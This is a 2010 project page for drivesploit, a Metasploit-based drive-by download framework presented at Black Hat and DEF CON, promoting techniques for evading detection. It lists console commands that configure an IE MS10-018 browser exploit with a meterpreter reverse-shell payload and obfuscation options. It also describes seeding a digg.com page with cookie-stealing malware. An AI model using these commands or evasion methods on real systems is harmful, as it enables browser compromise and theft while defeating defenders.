drivesploit

Search this site

drivesploit: drive-by download testing framework for metasploit

Please download the slides here: http://www.slideshare.net/wayne_armorize/drivesploit-circumventing-both-automated-and-manual-drivebydownload-detection
Please download the latest source code here: git://github.com/waynearmorize/drivesploit
commands used for this talk:
====
set ConsoleLogging 1
set LogLevel 3
set SessionLogging 1
set DisableCourtesyShell TRUE
use windows/browser/drivesploit_ms10_018_ie_behaviors
set payload windows/meterpreter/reverse_tcp
set SRVPORT 8083
set LHOST 127.0.0.1
set URIPATH /

set ds_random_vars true
set ds_insertion_shellcode true
set ds_concat_all true
====
all commands:
====
set ds_random_vars true
set ds_concat_shellcode true
ds_insertion_shellcode
set ds_concat_all true

set ds_enable_fingerprint true
set ds_fingerprint_browser ie6
====
Please use windows/browser/drivesploit_ms10_018_ie_behaviors as reference for developing a drivesploit.

Follow us on twitter: http://twitter.com/drivesploit

Follow the drivesploit blog for news and updates.

drivesploit will be released at black hat and DEF Con 2010, by the armorize gangs

http://www.blackhat.com/html/bh-us-10/bh-us-10-schedule.html
http://defcon.org/html/defcon-18/dc-18-speakers.html#Huang

This year saw the biggest news in Web security ever--Operation Aurora, which aimed at stealing source code and other intellectual properties and succeeded with more than 30 companies, including Google. Incidence response showed that the operation involved an IE 0-day drive-by-download, resulting in Google's compromise and leak of source code to jump points in Taiwan. The US Government is so concerned that they issued a demarche to the Chinese government.

Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in FaceBook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads.

If drive-bys are so easy to inject into high-traffic websites, then the question becomes, how easy it is to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and overview commonly used techniques.

We will reveal for the first time, in this conference, some very advanced techniques that are almost impossible to overcome by automated analysis in the past, now, and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit's a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how this technique easily defeats both automated AND manual detection.

At the very beginning of our talk, we will be giving out a digg.com page, which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download a malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an ipad to whomever from the audience that is able to correctly deobfuscate the javascript and give out the secret phrase.

Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight against Web-based malware. We will also present case studies of our incidence response efforts with organizations hit by Web malware injections such as Google's aurora incident. Based in Taiwan, Co-speaker Wayne has been personally involved in such incidence response efforts since the late 90's.

All source codes related to POC exploits against FaceBook, Google, Digg, LinkedIn, etc, as well as source code of Drivesploit, will be released as open source at the conference.

Attendees will gain the following:

1. Understanding of drive-by downloads and associated terminologies.

2. Information about various drive-by download infection vectors.

3. Appreciation of tools helpful for drive-by analysis, including Malzilla, spikermonkey, rhino, burp and wepawet

4. Realize why drive-by downloads are hard to analyze and detect. Why antivirus fail, why behavior-based approaches fail, and why even manual efforts are difficult

5. Learning the Drivesploit framework and how it can be used to develop poc drive-bys

6. Learning two new deadly techniques: behavior-based browser finterprinting and javascript timelock puzzles

7. Learning how to implement above two using Drivesploit to defeat both automated and manual drive-by analysis

8. Knowledge about the available countermeasures to this threat

Project leader:

Wayne Huang has extensive experience in the security industry and is a frequent speaker at security conferences including RSA (07, 10), SyScan (08, 09), OWASP (08, 09), Hacks in Taiwan (06, 07), WWW (03, 04), PHP (07) and DSN (04). He is the first author to achieve consecutive best paper nominations at the prestigious World Wide Web (WWW) Conferences (2003, 2004), and has a co-authored the Web Application Security chapter of "Computer Security in the 21st Century" (Springer US, 2005). Wayne is a PhD candidate at the EE, NTU, and has received his BS and MS in CS from NCTU.

Project contributors: Antonio Rohman Fernandez, Fyodor Yarochkin, Chris Hsiao
Subpages (1): blog

Sign in|Recent Site Activity|Report Abuse|Print Page|Remove Access|Powered By Google Sites